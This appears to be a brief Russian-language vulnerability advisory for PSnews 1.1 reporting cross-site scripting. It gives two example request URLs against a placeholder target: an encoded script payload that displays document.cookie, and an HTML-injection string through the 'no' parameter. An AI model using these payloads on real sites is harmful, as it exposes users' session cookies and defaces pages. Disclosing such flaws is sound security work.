Программа: PSnews 1.1
Удаленный пользователь может выполнить XSS нападение.
Пример:
http://[target]/index.php?function=show_all&no=
%253cscript>alert%2528document.cookie); %253c/script>
http://[target]/index.php?function=add_kom&no= ">%20<font%20size="20"%20color=red>%2
0<b>%20WackY%20%20</font>